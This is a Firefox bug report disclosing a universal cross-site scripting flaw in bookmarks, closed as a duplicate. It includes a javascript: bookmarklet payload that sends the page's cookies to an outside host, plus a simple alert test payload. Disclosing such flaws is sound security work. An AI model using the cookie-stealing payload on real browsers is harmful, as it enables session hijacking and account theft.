Closed Bug 1758263 Opened 3 years ago Closed 3 years ago

UXSS Bookmark Cookie Stealing

Categories

(Firefox :: Bookmarks & History, defect)

Product:
Firefox
Component:
Bookmarks & History
Version:
Firefox 99
Platform:
Desktop
All
Type:
defect

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1745023
Tracking Flags:
Tracking Status
firefox99 --- affected

People

(Reporter: annubiis, Unassigned)

Details

Attachments

(2 files)

cookie.mp4
5.42 MB, video/mp4
Details
cookie.mp4
5.42 MB, video/mp4
Details
Attached video cookie.mp4

Author: Omar Salazar (a.k.a Taurs Omar)
Twitter: taurusomar_

Bug Bounty Hunter

Description:

The vulnerability allows a malicious payload to be added to the URL section of the bookmark that is executed anywhere in the browser by bypassing restrictions on Firefox script execution.

Vulnerability Class:

Universal Cross-Site Scripting

Severity Level

High

Exploitation Technique:

Local/Remote

Type:

The vulnerability in question is a UXSS, an attacker can add a malicious payload to the bookmark to steal session cookies from any site or redirect you to a fake phishing page.

Attack Vectors:

1.) This would affect if the user bookmarked a contaminated page.
2.) A malicious person takes the device and adds the malicious marker.
3.) Internet cafe with malicious bookmarks, stealing session cookies from customers.
4.) Malicious technical service, adding the marker with the payload.

Payload UXSS

javascript:alert("UXSS")

UXSS Cookie Stealing

javascript:document.location='https://cors.ur0.me/?c='+escape(document.cookie);

Attached 2 videos of attacks

uxss.mp4
cookieStealing.pm4

Attached 1 images of attacks

Attached video cookie.mp4
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: